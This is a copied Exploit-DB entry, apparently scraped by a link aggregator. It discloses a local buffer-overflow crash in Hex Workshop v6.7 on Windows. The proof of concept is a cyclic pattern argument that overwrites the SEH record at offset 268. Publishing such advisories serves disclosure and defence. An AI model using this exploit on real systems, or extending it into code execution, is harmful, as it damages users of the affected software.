7

[dos] Hex Workshop v6.7 - Buffer overflow DoS

 1 year ago
source link: https://www.exploit-db.com/exploits/51080
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Hex Workshop v6.7 - Buffer overflow DoS

EDB-ID:

51080

EDB Verified:

Exploit:

  /  

Platform:

Windows

Date:

2023-03-27

Vulnerable App:

# Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-06
# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com
# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com
# Tested Version: v6.7
# Tested on:  Windows 10

CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119

Hex Workshop v6.7 is vulnerable to denial of service via a command line
file arguments and control the Structured Exception Handler (SEH) records.

Proof of concept:

Open HWorks32.exe from command line with a large string in Arguments, more
than 268 chars:

File 'C:\Hex Workshop\HWorks32.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."

0BADF00D   [+] Examining SEH chain
0BADF00D       SEH record (nseh field) at 0x0089e63c overwritten with
unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic
data after the handler

The application crash.

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK